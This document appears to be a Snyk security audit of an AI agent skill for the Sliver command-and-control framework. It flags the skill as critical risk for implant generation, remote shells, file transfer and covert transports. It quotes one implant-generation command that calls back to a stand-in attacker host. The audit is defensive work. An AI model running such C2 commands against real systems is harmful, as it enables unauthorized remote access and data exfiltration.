sliver

Fail

Audited by Snyk on Apr 16, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). Sliver is an explicit adversary C2 framework that provides implant generation, remote command execution (shell/execute), file transfer (download/upload), port forwarding and SOCKS5 proxying, covert transports (mTLS, WireGuard, HTTP/S, DNS) and BOF execution — all clear capabilities for deliberate unauthorized remote access, data exfiltration, and backdoor-style control.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill includes a runtime C2 callback URL (https://attacker.com) used in "generate --http https://attacker.com", which an implant would contact to receive and execute remote commands, so the external URL directly controls agent behavior.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill instructs running a C2 framework and commands that generate implants, start servers/listeners, spawn shells, execute arbitrary commands, and perform file transfers/port forwarding—actions that directly modify system state and can require privileged access—so it should be flagged.

Issues (3)

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 16, 2026, 08:21 PM
Issues
3
Security Audit — snyk — sliver